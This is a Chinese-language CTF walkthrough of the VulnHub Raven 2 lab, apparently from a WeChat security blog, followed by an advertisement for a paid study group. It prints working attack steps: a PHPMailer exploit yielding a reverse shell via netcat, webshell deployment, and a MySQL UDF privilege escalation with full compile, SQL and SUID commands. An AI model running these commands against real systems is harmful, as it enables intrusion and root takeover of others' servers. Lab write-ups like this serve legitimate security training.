免责声明
由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负 责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除 并致歉。谢谢!
镜像下载:https://www.vulnhub.com/entry/raven-2,269/
实验环境:
kali:192.168.78.128vulnhub镜像:192.168.78.133
1、kali查看本地ip地址,以便使用nmap扫描ip段存活主机
2、nmap扫描IP段,发现靶机的IP地址为192.168.78.133
4、访问http:192.168.78.133/
5、使用gobuster扫描目录,发现存在vendor目录,且发现靶机使用的是phpmailer
7、发现第一个flag,并且网站的路径为/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
8、发现phpmailer版本为5.2.16
9、去exp官网查询漏洞情况
a) 网站为:https://www.exploit-db.com/
10、下载exp
11、当访问shell的URL时,shell反弹到主机
URL:http://192.168.78.133/lws.php
windows:nc -lvvp 4444
12、查看文件目录
13、查询flag文件
/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png
/var/www/flag2.txt
14、 cat wp-config.php,在配置文件中发现了mysql账号密码
15、写入一句话木马,使用蚁剑连接
使用bash命令:python -c 'import pty;pty.spawn("/bin/bash")'
echo '' > 1.php
16、连接shell的时候遇到一个问题,哥斯拉可以连接成功,冰蝎连接失败,换个冰蝎的shell脚本才能连接,一句话木马只能使用哥斯拉和蚁剑连接。
选择冰蝎专用shell脚本
密码为x的webshell
冰蝎连接成功
17、利用mysql数据库提权
a) 连接数据库
b) 发现数据库没开启外链,使用sql语句开启外链
c)利用navict连接数据库,发现连接失败,怀疑防火墙禁止外链
d)MDUT 2.0 数据库利用工具 https://github.com/SafeGroceryStore/MDUT
利用冰蝎内网穿透,内网mysql出来连接我
连接成功之后进行UDF提权
查看root目录下的文件,发现存在第四个flag
flag4{df2bc5e951d91581467bb9a2a8ff4425}
18、利用exp手工提权,将find命令赋予suid权限,使用find的exec执行命令
(1)通过mysql账号密码,登录进入mysql,看看数据库的版本是否存在漏洞
(2)查看版本
(3)exp:https://www.exploit-db.com/exploits/1518,我们在KALI上编译生成so文件
wget https://www.exploit-db.com/download/1518
mv 1518 raptor_udf.c
gcc -g -c raptor_udf.c
gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
mv raptor_udf.so 1518.so
(4)将输出的1518.so上传到靶机中进行提权,进入mysql数据库中导入
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
创建do_system函数调用
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');
#配合使用find调用执行
touch dafei
find dafei –exec "whoami" \;
find dafei –exec "/bin/sh" \;
id
19、 利用bash进行提权
(1)查看bash命令的目录
(2)mysql中导入脚本,新增/usr/lib/mysql/plugin/1518.so
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
创建do_system函数调用
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /bin/bash');
欢迎加我wx,一起交流交流
湘安无事团队 知识星球 一次付费,永久免费,享受两大内部群+星球双重福利(付费之后会拉入内部成员群,直接免费续上)。有需要的直接添加上面微信 118永久,私我支付,直接拉内部成员群,扫码支付,三天后拉内部成员群。
内部群共享
1.fofa高级会员账号
2.360quake高级会员
3.某在线高级会员靶场账号(附带wp)
4.专属内部漏洞库(持续更新)
5.原创漏洞挖掘报告
6.it课表众多好课(持续更新,内容涉及安全+开发等)
7.在线答疑,不定期直播技术分享【湘南第一深情、wuli、Awake等】
星球介绍:
星球针对安全新人有优秀学习资源,星球专属嘉宾进行问题解答,
性价比很高。
如果你是入门不久,想要提升漏洞挖掘能力,那该星球是个不错的选择,星球内拥有
专属漏洞报告,
各种奇淫技巧、挖洞技术、专属嘉宾在线问答等。
欢迎您的加入,星球部分内容请你查看!!
星球内容介绍
星球内部提供众多好课
安全类:web安全、内网、src挖掘、kail、逆向、游戏漏洞挖掘、免杀等
开发类:python安全开发、java、Golang、php等开发课程
专栏提供内部漏洞库
专栏内容预览
扫码查看更多内容
文章引用微信公众号"WK安全",如有侵权,请联系管理员删除!
